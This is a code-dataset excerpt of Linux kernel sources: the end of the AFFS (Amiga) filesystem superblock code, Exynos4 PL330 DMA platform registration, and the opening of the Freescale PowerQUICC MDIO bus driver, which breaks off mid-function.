						SLAB_MEM_SPREAD),
					      init_once);
	return affs_inode_cachep ? 0 : -ENOMEM;
}
/* Tear down the inode slab cache on module unload / failed init. */
static void destroy_inodecache(void)
{
	kmem_cache_destroy(affs_inode_cachep);
}
/* VFS superblock operations for AFFS. */
static const struct super_operations affs_sops = {
	.alloc_inode	= affs_alloc_inode,
	.destroy_inode	= affs_destroy_inode,
	.write_inode	= affs_write_inode,
	.evict_inode	= affs_evict_inode,
	.put_super	= affs_put_super,
	.write_super	= affs_write_super,
	.sync_fs	= affs_sync_fs,
	.statfs		= affs_statfs,
	.remount_fs	= affs_remount,
	.show_options	= generic_show_options,
};
/* Mount option token IDs, matched against the table below. */
enum {
	Opt_bs, Opt_mode, Opt_mufs, Opt_prefix, Opt_protect,
	Opt_reserved, Opt_root, Opt_setgid, Opt_setuid,
	Opt_verbose, Opt_volume, Opt_ignore, Opt_err,
};

/*
 * Recognized mount options.  The quota options are accepted but
 * silently ignored (mapped to Opt_ignore) for compatibility.
 */
static const match_table_t tokens = {
	{Opt_bs, "bs=%u"},
	{Opt_mode, "mode=%o"},
	{Opt_mufs, "mufs"},
	{Opt_prefix, "prefix=%s"},
	{Opt_protect, "protect"},
	{Opt_reserved, "reserved=%u"},
	{Opt_root, "root=%u"},
	{Opt_setgid, "setgid=%u"},
	{Opt_setuid, "setuid=%u"},
	{Opt_verbose, "verbose"},
	{Opt_volume, "volume=%s"},
	{Opt_ignore, "grpquota"},
	{Opt_ignore, "noquota"},
	{Opt_ignore, "quota"},
	{Opt_ignore, "usrquota"},
	{Opt_err, NULL},
};
/*
 * Parse the comma-separated mount option string into the supplied
 * out-parameters.  Defaults are filled in first, so every output is
 * valid even when @options is NULL.
 *
 * Returns 1 on success, 0 on any parse error (a message is printed
 * for invalid blocksize / unknown options).
 *
 * NOTE(review): @volume is assumed to point at a buffer of at least
 * 32 bytes (see the strlcpy below) -- confirm against callers.
 */
static int
parse_options(char *options, uid_t *uid, gid_t *gid, int *mode, int *reserved, s32 *root,
		int *blocksize, char **prefix, char *volume, unsigned long *mount_opts)
{
	char *p;
	substring_t args[MAX_OPT_ARGS];

	/* Fill in defaults */

	*uid        = current_uid();
	*gid        = current_gid();
	*reserved   = 2;
	*root       = -1;	/* -1: probe for the root block later */
	*blocksize  = -1;	/* -1: try all supported block sizes */
	volume[0]   = ':';
	volume[1]   = 0;
	*mount_opts = 0;
	if (!options)
		return 1;

	while ((p = strsep(&options, ",")) != NULL) {
		int token, n, option;
		if (!*p)
			continue;	/* skip empty list entries */

		token = match_token(p, tokens, args);
		switch (token) {
		case Opt_bs:
			if (match_int(&args[0], &n))
				return 0;
			if (n != 512 && n != 1024 && n != 2048
			    && n != 4096) {
				printk ("AFFS: Invalid blocksize (512, 1024, 2048, 4096 allowed)\n");
				return 0;
			}
			*blocksize = n;
			break;
		case Opt_mode:
			/* octal, permission bits only */
			if (match_octal(&args[0], &option))
				return 0;
			*mode = option & 0777;
			*mount_opts |= SF_SETMODE;
			break;
		case Opt_mufs:
			*mount_opts |= SF_MUFS;
			break;
		case Opt_prefix:
			/* caller owns (and must free) the duplicated string */
			*prefix = match_strdup(&args[0]);
			if (!*prefix)
				return 0;
			*mount_opts |= SF_PREFIX;
			break;
		case Opt_protect:
			*mount_opts |= SF_IMMUTABLE;
			break;
		case Opt_reserved:
			if (match_int(&args[0], reserved))
				return 0;
			break;
		case Opt_root:
			if (match_int(&args[0], root))
				return 0;
			break;
		case Opt_setgid:
			if (match_int(&args[0], &option))
				return 0;
			*gid = option;
			*mount_opts |= SF_SETGID;
			break;
		case Opt_setuid:
			if (match_int(&args[0], &option))
				return 0;
			*uid = option;
			*mount_opts |= SF_SETUID;
			break;
		case Opt_verbose:
			*mount_opts |= SF_VERBOSE;
			break;
		case Opt_volume: {
			/* copy (truncated) into the fixed 32-byte buffer */
			char *vol = match_strdup(&args[0]);
			if (!vol)
				return 0;
			strlcpy(volume, vol, 32);
			kfree(vol);
			break;
		}
		case Opt_ignore:
		 	/* Silently ignore the quota options */
			break;
		default:
			printk("AFFS: Unrecognized mount option \"%s\" "
					"or missing value\n", p);
			return 0;
		}
	}
	return 1;
}
/* This function definitely needs to be split up. Some fine day I'll
 * hopefully have the guts to do so. Until then: sorry for the mess.
 *
 * Fills in @sb from the on-disk structures: parses mount options,
 * probes for the root block over all candidate block sizes, detects
 * the filesystem flavour from the boot block signature, loads the
 * block bitmap and instantiates the root dentry.
 *
 * Returns 0 on success or a negative errno; on failure all partial
 * state (sbi, prefix, bitmap, root buffer) is released here.
 */
static int affs_fill_super(struct super_block *sb, void *data, int silent)
{
	struct affs_sb_info	*sbi;
	struct buffer_head	*root_bh = NULL;
	struct buffer_head	*boot_bh;
	struct inode		*root_inode = NULL;
	s32			 root_block;
	int			 size, blocksize;
	u32			 chksum;
	int			 num_bm;
	int			 i, j;
	s32			 key;
	uid_t			 uid;
	gid_t			 gid;
	int			 reserved;
	unsigned long		 mount_flags;
	int			 tmp_flags;	/* fix remount prototype... */
	u8			 sig[4];
	int			 ret = -EINVAL;

	save_mount_options(sb, data);

	pr_debug("AFFS: read_super(%s)\n",data ? (const char *)data : "no options");

	sb->s_magic             = AFFS_SUPER_MAGIC;
	sb->s_op                = &affs_sops;
	sb->s_flags |= MS_NODIRATIME;

	sbi = kzalloc(sizeof(struct affs_sb_info), GFP_KERNEL);
	if (!sbi)
		return -ENOMEM;
	sb->s_fs_info = sbi;
	mutex_init(&sbi->s_bmlock);
	spin_lock_init(&sbi->symlink_lock);

	/* i doubles as scratch for the parsed mode here */
	if (!parse_options(data,&uid,&gid,&i,&reserved,&root_block,
				&blocksize,&sbi->s_prefix,
				sbi->s_volume, &mount_flags)) {
		printk(KERN_ERR "AFFS: Error parsing options\n");
		kfree(sbi->s_prefix);
		kfree(sbi);
		return -EINVAL;
	}
	/* N.B. after this point s_prefix must be released */

	sbi->s_flags   = mount_flags;
	sbi->s_mode    = i;
	sbi->s_uid     = uid;
	sbi->s_gid     = gid;
	sbi->s_reserved= reserved;

	/* Get the size of the device in 512-byte blocks.
	 * If we later see that the partition uses bigger
	 * blocks, we will have to change it.
	 */

	size = sb->s_bdev->bd_inode->i_size >> 9;
	pr_debug("AFFS: initial blocksize=%d, #blocks=%d\n", 512, size);

	affs_set_blocksize(sb, PAGE_SIZE);
	/* Try to find root block. Its location depends on the block size. */

	/* Probe 512..4096 unless the user pinned a blocksize. */
	i = 512;
	j = 4096;
	if (blocksize > 0) {
		i = j = blocksize;
		size = size / (blocksize / 512);
	}
	/* key doubles as a "root found" flag below */
	for (blocksize = i, key = 0; blocksize <= j; blocksize <<= 1, size >>= 1) {
		sbi->s_root_block = root_block;
		if (root_block < 0)
			sbi->s_root_block = (reserved + size - 1) / 2;
		pr_debug("AFFS: setting blocksize to %d\n", blocksize);
		affs_set_blocksize(sb, blocksize);
		sbi->s_partition_size = size;

		/* The root block location that was calculated above is not
		 * correct if the partition size is an odd number of 512-
		 * byte blocks, which will be rounded down to a number of
		 * 1024-byte blocks, and if there were an even number of
		 * reserved blocks. Ideally, all partition checkers should
		 * report the real number of blocks of the real blocksize,
		 * but since this just cannot be done, we have to try to
		 * find the root block anyways. In the above case, it is one
		 * block behind the calculated one. So we check this one, too.
		 */
		for (num_bm = 0; num_bm < 2; num_bm++) {
			pr_debug("AFFS: Dev %s, trying root=%u, bs=%d, "
				"size=%d, reserved=%d\n",
				sb->s_id,
				sbi->s_root_block + num_bm,
				blocksize, size, reserved);
			root_bh = affs_bread(sb, sbi->s_root_block + num_bm);
			if (!root_bh)
				continue;
			/* a valid root block has a good checksum, T_SHORT head
			 * and ST_ROOT tail type */
			if (!affs_checksum_block(sb, root_bh) &&
			    be32_to_cpu(AFFS_ROOT_HEAD(root_bh)->ptype) == T_SHORT &&
			    be32_to_cpu(AFFS_ROOT_TAIL(sb, root_bh)->stype) == ST_ROOT) {
				sbi->s_hashsize    = blocksize / 4 - 56;
				sbi->s_root_block += num_bm;
				key                        = 1;
				goto got_root;
			}
			affs_brelse(root_bh);
			root_bh = NULL;
		}
	}
	if (!silent)
		printk(KERN_ERR "AFFS: No valid root block on device %s\n",
			sb->s_id);
	goto out_error;

	/* N.B. after this point bh must be released */
got_root:
	root_block = sbi->s_root_block;

	/* Find out which kind of FS we have */
	boot_bh = sb_bread(sb, 0);
	if (!boot_bh) {
		printk(KERN_ERR "AFFS: Cannot read boot block\n");
		goto out_error;
	}
	memcpy(sig, boot_bh->b_data, 4);
	brelse(boot_bh);
	chksum = be32_to_cpu(*(__be32 *)sig);

	/* Dircache filesystems are compatible with non-dircache ones
	 * when reading. As long as they aren't supported, writing is
	 * not recommended.
	 */
	if ((chksum == FS_DCFFS || chksum == MUFS_DCFFS || chksum == FS_DCOFS
	     || chksum == MUFS_DCOFS) && !(sb->s_flags & MS_RDONLY)) {
		printk(KERN_NOTICE "AFFS: Dircache FS - mounting %s read only\n",
			sb->s_id);
		sb->s_flags |= MS_RDONLY;
	}
	/* Map the boot-block signature to the SF_* feature flags. */
	switch (chksum) {
		case MUFS_FS:
		case MUFS_INTLFFS:
		case MUFS_DCFFS:
			sbi->s_flags |= SF_MUFS;
			/* fall thru */
		case FS_INTLFFS:
		case FS_DCFFS:
			sbi->s_flags |= SF_INTL;
			break;
		case MUFS_FFS:
			sbi->s_flags |= SF_MUFS;
			break;
		case FS_FFS:
			break;
		case MUFS_OFS:
			sbi->s_flags |= SF_MUFS;
			/* fall thru */
		case FS_OFS:
			sbi->s_flags |= SF_OFS;
			sb->s_flags |= MS_NOEXEC;
			break;
		case MUFS_DCOFS:
		case MUFS_INTLOFS:
			sbi->s_flags |= SF_MUFS;
			/* NOTE(review): no break here -- presumably an
			 * intentional fallthrough like the cases above */
		case FS_DCOFS:
		case FS_INTLOFS:
			sbi->s_flags |= SF_INTL | SF_OFS;
			sb->s_flags |= MS_NOEXEC;
			break;
		default:
			printk(KERN_ERR "AFFS: Unknown filesystem on device %s: %08X\n",
				sb->s_id, chksum);
			goto out_error;
	}

	if (mount_flags & SF_VERBOSE) {
		/* disk_name is a BCPL string: first byte is the length */
		u8 len = AFFS_ROOT_TAIL(sb, root_bh)->disk_name[0];
		printk(KERN_NOTICE "AFFS: Mounting volume \"%.*s\": Type=%.3s\\%c, Blocksize=%d\n",
			len > 31 ? 31 : len,
			AFFS_ROOT_TAIL(sb, root_bh)->disk_name + 1,
			sig, sig[3] + '0', blocksize);
	}

	sb->s_flags |= MS_NODEV | MS_NOSUID;

	sbi->s_data_blksize = sb->s_blocksize;
	if (sbi->s_flags & SF_OFS)
		sbi->s_data_blksize -= 24;	/* OFS data blocks carry a 24-byte header */

	/* Keep super block in cache */
	sbi->s_root_bh = root_bh;
	/* N.B. after this point s_root_bh must be released */

	tmp_flags = sb->s_flags;
	if (affs_init_bitmap(sb, &tmp_flags))
		goto out_error;
	sb->s_flags = tmp_flags;

	/* set up enough so that it can read an inode */

	root_inode = affs_iget(sb, root_block);
	if (IS_ERR(root_inode)) {
		ret = PTR_ERR(root_inode);
		goto out_error;
	}

	if (AFFS_SB(sb)->s_flags & SF_INTL)
		sb->s_d_op = &affs_intl_dentry_operations;
	else
		sb->s_d_op = &affs_dentry_operations;

	sb->s_root = d_make_root(root_inode);
	if (!sb->s_root) {
		printk(KERN_ERR "AFFS: Get root inode failed\n");
		goto out_error;
	}

	pr_debug("AFFS: s_flags=%lX\n",sb->s_flags);
	return 0;

	/*
	 * Begin the cascaded cleanup ...
	 */
out_error:
	kfree(sbi->s_bitmap);
	affs_brelse(root_bh);
	kfree(sbi->s_prefix);
	kfree(sbi);
	sb->s_fs_info = NULL;
	return ret;
}
/*
 * ->remount_fs: re-parse the option string and update the in-core
 * options; switch the bitmap on/off when toggling between ro and rw.
 *
 * NOTE(review): kstrdup() can return NULL (including when @data is
 * NULL); replace_mount_options() is handed the result unchecked --
 * verify it tolerates NULL in this kernel version.
 */
static int
affs_remount(struct super_block *sb, int *flags, char *data)
{
	struct affs_sb_info	*sbi = AFFS_SB(sb);
	int			 blocksize;
	uid_t			 uid;
	gid_t			 gid;
	int			 mode;
	int			 reserved;
	int			 root_block;
	unsigned long		 mount_flags;
	int			 res = 0;
	char			*new_opts = kstrdup(data, GFP_KERNEL);
	char			 volume[32];
	char			*prefix = NULL;

	pr_debug("AFFS: remount(flags=0x%x,opts=\"%s\")\n",*flags,data);

	*flags |= MS_NODIRATIME;

	/* work on a copy so a parse failure leaves s_volume untouched */
	memcpy(volume, sbi->s_volume, 32);
	if (!parse_options(data, &uid, &gid, &mode, &reserved, &root_block,
			   &blocksize, &prefix, volume,
			   &mount_flags)) {
		kfree(prefix);
		kfree(new_opts);
		return -EINVAL;
	}

	/* new_opts ownership passes to the VFS here */
	replace_mount_options(sb, new_opts);

	sbi->s_flags = mount_flags;
	sbi->s_mode  = mode;
	sbi->s_uid   = uid;
	sbi->s_gid   = gid;
	/* protect against readers of the symlink prefix/volume */
	spin_lock(&sbi->symlink_lock);
	if (prefix) {
		kfree(sbi->s_prefix);
		sbi->s_prefix = prefix;
	}
	memcpy(sbi->s_volume, volume, 32);
	spin_unlock(&sbi->symlink_lock);

	/* nothing more to do unless the ro/rw state changes */
	if ((*flags & MS_RDONLY) == (sb->s_flags & MS_RDONLY))
		return 0;
	if (*flags & MS_RDONLY) {
		/* going read-only: flush and drop the bitmap */
		affs_write_super(sb);
		affs_free_bitmap(sb);
	} else
		res = affs_init_bitmap(sb, flags);

	return res;
}
static int
affs_statfs(struct dentry *dentry, struct kstatfs *buf)
{
struct super_block *sb = dentry->d_sb;
int free;
u64 id = huge_encode_dev(sb->s_bdev->bd_dev);
pr_debug("AFFS: statfs() partsize=%d, reserved=%d\n",AFFS_SB(sb)->s_partition_size,
AFFS_SB(sb)->s_reserved);
free = affs_count_free_blocks(sb);
buf->f_type = AFFS_SUPER_MAGIC;
buf->f_bsize = sb->s_blocksize;
buf->f_blocks = AFFS_SB(sb)->s_partition_size - AFFS_SB(sb)->s_reserved;
buf->f_bfree = free;
buf->f_bavail = free;
buf->f_fsid.val[0] = (u32)id;
buf->f_fsid.val[1] = (u32)(id >> 32);
buf->f_namelen = 30;
return 0;
}
/* Mount entry point: AFFS always lives on a block device. */
static struct dentry *affs_mount(struct file_system_type *fs_type,
	int flags, const char *dev_name, void *data)
{
	return mount_bdev(fs_type, flags, dev_name, data, affs_fill_super);
}
/* Filesystem type registration record. */
static struct file_system_type affs_fs_type = {
	.owner		= THIS_MODULE,
	.name		= "affs",
	.mount		= affs_mount,
	.kill_sb	= kill_block_super,
	.fs_flags	= FS_REQUIRES_DEV,
};
/*
 * Module init: create the inode cache, then register the filesystem.
 * The cache is torn down again if registration fails.
 */
static int __init init_affs_fs(void)
{
	int err;

	err = init_inodecache();
	if (err)
		return err;

	err = register_filesystem(&affs_fs_type);
	if (err)
		destroy_inodecache();

	return err;
}
/* Module exit: unregister first, then free the inode cache. */
static void __exit exit_affs_fs(void)
{
	unregister_filesystem(&affs_fs_type);
	destroy_inodecache();
}
MODULE_DESCRIPTION("Amiga filesystem support for Linux");
MODULE_LICENSE("GPL");
module_init(init_affs_fs)
module_exit(exit_affs_fs)
| gpl-2.0 |
sub77/matissewifi | arch/arm/mach-exynos/dma.c | 4611 | 5390 | /* linux/arch/arm/mach-exynos4/dma.c
*
* Copyright (c) 2011 Samsung Electronics Co., Ltd.
* http://www.samsung.com
*
* Copyright (C) 2010 Samsung Electronics Co. Ltd.
* Jaswinder Singh <jassi.brar@samsung.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <linux/dma-mapping.h>
#include <linux/amba/bus.h>
#include <linux/amba/pl330.h>
#include <linux/of.h>
#include <asm/irq.h>
#include <plat/devs.h>
#include <plat/irqs.h>
#include <plat/cpu.h>
#include <mach/map.h>
#include <mach/irqs.h>
#include <mach/dma.h>
/* Peripheral request IDs routed to PDMA0 on Exynos4210. */
static u8 exynos4210_pdma0_peri[] = {
	DMACH_PCM0_RX,
	DMACH_PCM0_TX,
	DMACH_PCM2_RX,
	DMACH_PCM2_TX,
	DMACH_MSM_REQ0,
	DMACH_MSM_REQ2,
	DMACH_SPI0_RX,
	DMACH_SPI0_TX,
	DMACH_SPI2_RX,
	DMACH_SPI2_TX,
	DMACH_I2S0S_TX,
	DMACH_I2S0_RX,
	DMACH_I2S0_TX,
	DMACH_I2S2_RX,
	DMACH_I2S2_TX,
	DMACH_UART0_RX,
	DMACH_UART0_TX,
	DMACH_UART2_RX,
	DMACH_UART2_TX,
	DMACH_UART4_RX,
	DMACH_UART4_TX,
	DMACH_SLIMBUS0_RX,
	DMACH_SLIMBUS0_TX,
	DMACH_SLIMBUS2_RX,
	DMACH_SLIMBUS2_TX,
	DMACH_SLIMBUS4_RX,
	DMACH_SLIMBUS4_TX,
	DMACH_AC97_MICIN,
	DMACH_AC97_PCMIN,
	DMACH_AC97_PCMOUT,
};

/*
 * Peripheral request IDs routed to PDMA0 on Exynos4212/4412
 * (MIPI HSI channels replace the 4210's MSM request lines).
 */
static u8 exynos4212_pdma0_peri[] = {
	DMACH_PCM0_RX,
	DMACH_PCM0_TX,
	DMACH_PCM2_RX,
	DMACH_PCM2_TX,
	DMACH_MIPI_HSI0,
	DMACH_MIPI_HSI1,
	DMACH_SPI0_RX,
	DMACH_SPI0_TX,
	DMACH_SPI2_RX,
	DMACH_SPI2_TX,
	DMACH_I2S0S_TX,
	DMACH_I2S0_RX,
	DMACH_I2S0_TX,
	DMACH_I2S2_RX,
	DMACH_I2S2_TX,
	DMACH_UART0_RX,
	DMACH_UART0_TX,
	DMACH_UART2_RX,
	DMACH_UART2_TX,
	DMACH_UART4_RX,
	DMACH_UART4_TX,
	DMACH_SLIMBUS0_RX,
	DMACH_SLIMBUS0_TX,
	DMACH_SLIMBUS2_RX,
	DMACH_SLIMBUS2_TX,
	DMACH_SLIMBUS4_RX,
	DMACH_SLIMBUS4_TX,
	DMACH_AC97_MICIN,
	DMACH_AC97_PCMIN,
	DMACH_AC97_PCMOUT,
	DMACH_MIPI_HSI4,
	DMACH_MIPI_HSI5,
};
/*
 * Platform data for PDMA0; the peri table is selected per-SoC in
 * exynos4_dma_init().  Marked static: it is only referenced within
 * this file, matching exynos4_pdma1_pdata and exynos4_mdma1_pdata
 * below (was previously missing the qualifier and leaked into the
 * global namespace).
 */
static struct dma_pl330_platdata exynos4_pdma0_pdata;

static AMBA_AHB_DEVICE(exynos4_pdma0, "dma-pl330.0", 0x00041330,
	EXYNOS4_PA_PDMA0, {EXYNOS4_IRQ_PDMA0}, &exynos4_pdma0_pdata);
/* Peripheral request IDs routed to PDMA1 on Exynos4210. */
static u8 exynos4210_pdma1_peri[] = {
	DMACH_PCM0_RX,
	DMACH_PCM0_TX,
	DMACH_PCM1_RX,
	DMACH_PCM1_TX,
	DMACH_MSM_REQ1,
	DMACH_MSM_REQ3,
	DMACH_SPI1_RX,
	DMACH_SPI1_TX,
	DMACH_I2S0S_TX,
	DMACH_I2S0_RX,
	DMACH_I2S0_TX,
	DMACH_I2S1_RX,
	DMACH_I2S1_TX,
	DMACH_UART0_RX,
	DMACH_UART0_TX,
	DMACH_UART1_RX,
	DMACH_UART1_TX,
	DMACH_UART3_RX,
	DMACH_UART3_TX,
	DMACH_SLIMBUS1_RX,
	DMACH_SLIMBUS1_TX,
	DMACH_SLIMBUS3_RX,
	DMACH_SLIMBUS3_TX,
	DMACH_SLIMBUS5_RX,
	DMACH_SLIMBUS5_TX,
};

/* Peripheral request IDs routed to PDMA1 on Exynos4212/4412. */
static u8 exynos4212_pdma1_peri[] = {
	DMACH_PCM0_RX,
	DMACH_PCM0_TX,
	DMACH_PCM1_RX,
	DMACH_PCM1_TX,
	DMACH_MIPI_HSI2,
	DMACH_MIPI_HSI3,
	DMACH_SPI1_RX,
	DMACH_SPI1_TX,
	DMACH_I2S0S_TX,
	DMACH_I2S0_RX,
	DMACH_I2S0_TX,
	DMACH_I2S1_RX,
	DMACH_I2S1_TX,
	DMACH_UART0_RX,
	DMACH_UART0_TX,
	DMACH_UART1_RX,
	DMACH_UART1_TX,
	DMACH_UART3_RX,
	DMACH_UART3_TX,
	DMACH_SLIMBUS1_RX,
	DMACH_SLIMBUS1_TX,
	DMACH_SLIMBUS3_RX,
	DMACH_SLIMBUS3_TX,
	DMACH_SLIMBUS5_RX,
	DMACH_SLIMBUS5_TX,
	DMACH_SLIMBUS0AUX_RX,
	DMACH_SLIMBUS0AUX_TX,
	DMACH_SPDIF,
	DMACH_MIPI_HSI6,
	DMACH_MIPI_HSI7,
};

/* Platform data for PDMA1; peri table selected per-SoC at init time. */
static struct dma_pl330_platdata exynos4_pdma1_pdata;

static AMBA_AHB_DEVICE(exynos4_pdma1, "dma-pl330.1", 0x00041330,
	EXYNOS4_PA_PDMA1, {EXYNOS4_IRQ_PDMA1}, &exynos4_pdma1_pdata);
/* Memory-to-memory channels served by the MDMA controller. */
static u8 mdma_peri[] = {
	DMACH_MTOM_0,
	DMACH_MTOM_1,
	DMACH_MTOM_2,
	DMACH_MTOM_3,
	DMACH_MTOM_4,
	DMACH_MTOM_5,
	DMACH_MTOM_6,
	DMACH_MTOM_7,
};

/* MDMA platform data is identical on all Exynos4 variants. */
static struct dma_pl330_platdata exynos4_mdma1_pdata = {
	.nr_valid_peri = ARRAY_SIZE(mdma_peri),
	.peri_id = mdma_peri,
};

static AMBA_AHB_DEVICE(exynos4_mdma1, "dma-pl330.2", 0x00041330,
	EXYNOS4_PA_MDMA1, {EXYNOS4_IRQ_MDMA1}, &exynos4_mdma1_pdata);
/*
 * Register the PL330 DMA controllers as AMBA devices, selecting the
 * SoC-specific peripheral tables first.  Skipped entirely when the
 * platform is described by device tree.
 */
static int __init exynos4_dma_init(void)
{
	/* DT-based boots describe the DMA controllers themselves. */
	if (of_have_populated_dt())
		return 0;

	if (soc_is_exynos4210()) {
		exynos4_pdma0_pdata.nr_valid_peri =
			ARRAY_SIZE(exynos4210_pdma0_peri);
		exynos4_pdma0_pdata.peri_id = exynos4210_pdma0_peri;
		exynos4_pdma1_pdata.nr_valid_peri =
			ARRAY_SIZE(exynos4210_pdma1_peri);
		exynos4_pdma1_pdata.peri_id = exynos4210_pdma1_peri;
	} else if (soc_is_exynos4212() || soc_is_exynos4412()) {
		exynos4_pdma0_pdata.nr_valid_peri =
			ARRAY_SIZE(exynos4212_pdma0_peri);
		exynos4_pdma0_pdata.peri_id = exynos4212_pdma0_peri;
		exynos4_pdma1_pdata.nr_valid_peri =
			ARRAY_SIZE(exynos4212_pdma1_peri);
		exynos4_pdma1_pdata.peri_id = exynos4212_pdma1_peri;
	}

	/* PDMAs do slave + cyclic transfers; MDMA does memcpy only. */
	dma_cap_set(DMA_SLAVE, exynos4_pdma0_pdata.cap_mask);
	dma_cap_set(DMA_CYCLIC, exynos4_pdma0_pdata.cap_mask);
	amba_device_register(&exynos4_pdma0_device, &iomem_resource);

	dma_cap_set(DMA_SLAVE, exynos4_pdma1_pdata.cap_mask);
	dma_cap_set(DMA_CYCLIC, exynos4_pdma1_pdata.cap_mask);
	amba_device_register(&exynos4_pdma1_device, &iomem_resource);

	dma_cap_set(DMA_MEMCPY, exynos4_mdma1_pdata.cap_mask);
	amba_device_register(&exynos4_mdma1_device, &iomem_resource);

	return 0;
}
arch_initcall(exynos4_dma_init);
| gpl-2.0 |
kamarush/android_kernel_lge_hammerhead | drivers/net/ethernet/freescale/fsl_pq_mdio.c | 4867 | 10805 | /*
* Freescale PowerQUICC Ethernet Driver -- MIIM bus implementation
* Provides Bus interface for MIIM regs
*
* Author: Andy Fleming <afleming@freescale.com>
* Modifier: Sandeep Gopalpet <sandeep.kumar@freescale.com>
*
* Copyright 2002-2004, 2008-2009 Freescale Semiconductor, Inc.
*
* Based on gianfar_mii.c and ucc_geth_mii.c (Li Yang, Kim Phillips)
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
*/
#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/errno.h>
#include <linux/unistd.h>
#include <linux/slab.h>
#include <linux/interrupt.h>
#include <linux/init.h>
#include <linux/delay.h>
#include <linux/netdevice.h>
#include <linux/etherdevice.h>
#include <linux/skbuff.h>
#include <linux/spinlock.h>
#include <linux/mm.h>
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/crc32.h>
#include <linux/mii.h>
#include <linux/phy.h>
#include <linux/of.h>
#include <linux/of_address.h>
#include <linux/of_mdio.h>
#include <linux/of_platform.h>
#include <asm/io.h>
#include <asm/irq.h>
#include <asm/uaccess.h>
#include <asm/ucc.h>
#include "gianfar.h"
#include "fsl_pq_mdio.h"
/*
 * Per-bus private state: the raw ioremap() cookie (for iounmap) and
 * the adjusted pointer to the MIIM register block.
 */
struct fsl_pq_mdio_priv {
	void __iomem *map;
	struct fsl_pq_mdio __iomem *regs;
};
/*
 * Write value to the PHY at mii_id at register regnum,
 * on the bus attached to the local interface, which may be different from the
 * generic mdio bus (tied to a single interface), waiting until the write is
 * done before returning. This is helpful in programming interfaces like
 * the TBI which control interfaces like onchip SERDES and are always tied to
 * the local mdio pins, which may not be the same as system mdio bus, used for
 * controlling the external PHYs, for example.
 *
 * Always returns 0.
 */
int fsl_pq_local_mdio_write(struct fsl_pq_mdio __iomem *regs, int mii_id,
		int regnum, u16 value)
{
	/* Set the PHY address and the register address we want to write */
	out_be32(&regs->miimadd, (mii_id << 8) | regnum);

	/* Write out the value we want */
	out_be32(&regs->miimcon, value);

	/* Wait for the transaction to finish */
	/* NOTE(review): unbounded busy-wait -- hangs if the MDIO bus
	 * never deasserts BUSY; the reset path below uses a timeout. */
	while (in_be32(&regs->miimind) & MIIMIND_BUSY)
		cpu_relax();

	return 0;
}
/*
 * Read the bus for PHY at addr mii_id, register regnum, and
 * return the value.  Clears miimcom first.  All PHY operation
 * done on the bus attached to the local interface,
 * which may be different from the generic mdio bus
 * This is helpful in programming interfaces like
 * the TBI which, in turn, control interfaces like onchip SERDES
 * and are always tied to the local mdio pins, which may not be the
 * same as system mdio bus, used for controlling the external PHYs, for eg.
 */
int fsl_pq_local_mdio_read(struct fsl_pq_mdio __iomem *regs,
		int mii_id, int regnum)
{
	u16 value;

	/* Set the PHY address and the register address we want to read */
	out_be32(&regs->miimadd, (mii_id << 8) | regnum);

	/* Clear miimcom, and then initiate a read */
	out_be32(&regs->miimcom, 0);
	out_be32(&regs->miimcom, MII_READ_COMMAND);

	/* Wait for the transaction to finish */
	/* NOTE(review): unbounded busy-wait, same caveat as the write path */
	while (in_be32(&regs->miimind) & (MIIMIND_NOTVALID | MIIMIND_BUSY))
		cpu_relax();

	/* Grab the value of the register from miimstat;
	 * only the low 16 bits are kept (u16 truncation) */
	value = in_be32(&regs->miimstat);

	return value;
}
/* Fetch the MIIM register block stashed in the bus private data. */
static struct fsl_pq_mdio __iomem *fsl_pq_mdio_get_regs(struct mii_bus *bus)
{
	return ((struct fsl_pq_mdio_priv *)bus->priv)->regs;
}
/*
 * Write value to the PHY at mii_id at register regnum,
 * on the bus, waiting until the write is done before returning.
 * (mii_bus ->write callback; thin wrapper over the local-regs variant.)
 */
int fsl_pq_mdio_write(struct mii_bus *bus, int mii_id, int regnum, u16 value)
{
	struct fsl_pq_mdio __iomem *regs = fsl_pq_mdio_get_regs(bus);

	/* Write to the local MII regs */
	return fsl_pq_local_mdio_write(regs, mii_id, regnum, value);
}
/*
 * Read the bus for PHY at addr mii_id, register regnum, and
 * return the value. Clears miimcom first.
 * (mii_bus ->read callback; thin wrapper over the local-regs variant.)
 */
int fsl_pq_mdio_read(struct mii_bus *bus, int mii_id, int regnum)
{
	struct fsl_pq_mdio __iomem *regs = fsl_pq_mdio_get_regs(bus);

	/* Read the local MII regs */
	return fsl_pq_local_mdio_read(regs, mii_id, regnum);
}
/*
 * Reset the MIIM registers, and wait for the bus to free.
 * Unlike the read/write paths, this wait is bounded by
 * PHY_INIT_TIMEOUT iterations; returns -EBUSY on timeout, 0 on success.
 */
static int fsl_pq_mdio_reset(struct mii_bus *bus)
{
	struct fsl_pq_mdio __iomem *regs = fsl_pq_mdio_get_regs(bus);
	int timeout = PHY_INIT_TIMEOUT;

	mutex_lock(&bus->mdio_lock);

	/* Reset the management interface */
	out_be32(&regs->miimcfg, MIIMCFG_RESET);

	/* Setup the MII Mgmt clock speed */
	out_be32(&regs->miimcfg, MIIMCFG_INIT_VALUE);

	/* Wait until the bus is free (timeout only goes negative
	 * when BUSY was still set on the final check) */
	while ((in_be32(&regs->miimind) & MIIMIND_BUSY) && timeout--)
		cpu_relax();

	mutex_unlock(&bus->mdio_lock);

	if (timeout < 0) {
		printk(KERN_ERR "%s: The MII Bus is stuck!\n",
				bus->name);
		return -EBUSY;
	}

	return 0;
}
/*
 * Build a unique bus id of the form "<node-name>@<translated-addr>"
 * into @name (MII_BUS_ID_SIZE bytes).  Falls back to OF_BAD_ADDR in
 * the id when the node has no translatable address.
 */
void fsl_pq_mdio_bus_name(char *name, struct device_node *np)
{
	const u32 *addr;
	u64 taddr = OF_BAD_ADDR;

	addr = of_get_address(np, 0, NULL, NULL);
	if (addr)
		taddr = of_translate_address(np, addr);

